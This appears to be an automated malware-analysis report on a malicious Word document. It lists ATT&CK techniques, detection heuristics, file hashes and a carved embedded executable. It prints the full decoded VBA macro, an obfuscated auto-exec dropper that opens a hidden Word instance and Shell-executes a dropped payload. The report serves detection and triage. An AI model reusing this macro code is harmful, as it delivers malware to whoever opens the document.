MALICIOUS
674
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros. The macros leverage `CreateObject` and `Shell` calls to execute an embedded PE executable (`embedded_office_0000984e.exe`). This executable is detected by ClamAV as `BC.Win.Packer.Troll-14`. The VBA code also attempts to create a persistence entry via `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy`.
Heuristics 18
-
OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
-
ClamAV: BC.Win.Packer.Troll-14 critical CLAMAV_DETECTIONClamAV detected this file as malware: BC.Win.Packer.Troll-14
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILEOLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim wep As Variant wep = Shell(jrb, 0) End Function -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
VBJASD = "lakjdklashdbjkasn" Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n") bhGdggwSw.Visible = nnff -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
VBJASD = "lakjdklashdbjkasn" Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n") bhGdggwSw.Visible = nnff -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() BCHJASD = "1';23l'1p2l32 s" -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Function Sub Workbook_Open() Rewew -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() Rewew -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
KKLOR = YhhrJne(3 + 90 + wpp) OOKRR = Environ$(VGDHE) + KKLOR DDVD = "" & "." & "" -
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2070 bytes |
SHA-256: 6ab78c895cd5d628277ee3e9b75276748ae67e953ccb968cc37013b286a736f0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Loie()
Rewew
End Sub
Sub Rewew()
Dim nnff As Boolean, wpp As Integer, FJSAD As String
wpp = 7 - 8
VGDHE = UHbdd()
VGDHE = VGDHE & "P"
nnff = False
On Error Resume Next
Dim WOIEW As String
KKLOR = YhhrJne(3 + 90 + wpp)
OOKRR = Environ$(VGDHE) + KKLOR
DDVD = "" & "." & ""
GGIIR = DDVD + "p"
GGIIR = GGIIR & "i" & "f"
DEIBE = DDVD & "rt" & YhhrJne(99 + 3)
FFFNNNF = OOKRR + "nfbd" + DEIBE
SSHHDD = OOKRR & "dsss" + DEIBE
WOIEW = OOKRR + "st1" & GGIIR
Module1.HNbfw (FFFNNNF)
Module1.HNbfw (SSHHDD)
Module1.Nnfhhe
RLKDWD = Environ$(VGDHE) & "\nfbd" & ".rt" & "f"
VBJASD = "lakjdklashdbjkasn"
Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
bhGdggwSw.Visible = nnff
bhGdggwSw.Documents.Open (RLKDWD)
Module1.Polkd (2)
HYUASGD = Module1.Pjndw(WOIEW)
Module1.Polkd (3)
bhGdggwSw.Quit
Set bhGdggwSw = Nothing
End Sub
Public Function YhhrJne(wbrw As Integer)
YhhrJne = Chr(wbrw)
End Function
Public Function UHbdd()
UHbdd = "T" & "EM"
End Function
Sub Workbook_Open()
Rewew
End Sub
Sub AutoOpen()
BCHJASD = "1';23l'1p2l32 s"
Loie
End Sub
Sub Auto_Open()
Rewew
End Sub
Attribute VB_Name = "Module1"
Sub Polkd(Jbse As Long)
poew = 50
Dim Nejw As Long
Dim Tgve As Long
Tgve = Jbse + Timer
Nejw = Tgve
Do While Timer < Nejw
DoEvents
Loop
End Sub
Public Function Pjndw(jrb As String)
Dim wep As Variant
wep = Shell(jrb, 0)
End Function
Sub Nnfhhe()
HVYUWEQ = "qiwoudbqiow dqgjqjwhd"
HVYUWEQ = "qiwoudbqiow dqgjqjwhd"
Polkd (2)
HVYUWEQ = "qiwoudbqiow dqgjqjwhd"
End Sub
Public Function HNbfw(kjrj As String)
ActiveDocument.SaveAs FileName:=kjrj, FileFormat:=wdFormatRTF
End Function
|
|||
embedded_office_0000984e.exe |
embedded-pe | Office MZ+PE at offset 0x984E | 171956 bytes |
SHA-256: db3a2e821ad6021450ea00243b15c2bf668940b7576d986ca4a9885be094b216 |
|||
|
Detection
ClamAV:
BC.Win.Packer.Troll-14
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1520687343/Ole10Native | 148172 bytes |
SHA-256: fe8dba3bbf003f0a2c6afabab23451a8e7cfed60a4ad7d552b8cbc22817fbf36 |
|||
|
Detection
ClamAV:
BC.Win.Packer.Troll-14
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.